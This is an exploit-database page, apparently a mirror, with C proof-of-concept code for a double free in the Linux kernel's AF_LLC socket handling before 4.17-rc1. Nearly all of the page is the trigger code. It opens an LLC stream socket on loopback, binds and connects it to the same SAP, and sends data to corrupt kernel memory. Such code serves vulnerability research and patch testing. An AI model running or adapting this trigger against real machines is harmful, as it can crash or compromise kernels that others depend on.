Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free
Source: http://www.securiteam.com/ Author: SecuriTeam Published: 2018-05-03
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>
 
struct sockaddr_llc {
 short  sllc_family;
 short  sllc_arphrd;
 unsigned char   sllc_test;
 unsigned char   sllc_xid;
 unsigned char sllc_ua;
 unsigned char   sllc_sap;
 unsigned char   sllc_mac[6];
 unsigned char   __pad[2];
};
 
void test()
{
 /* Open a connection-oriented (SOCK_STREAM) LLC socket. */
 int fd = socket(AF_LLC, SOCK_STREAM, 0);
 char output[32] = "lo";
 /* Restrict the socket to the loopback interface. */
 setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10);
 /* Bind to SAP 2, then connect to the same SAP. */
 struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2};
 bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc));
 struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2};
 connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc));

 /* Send 0x10 bytes over the connected socket. */
 char msg[0x10] = "aaaa";
 send(fd, msg, 0x10, 0);
}
 
int main()
{
 test();
 return 0;
}
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved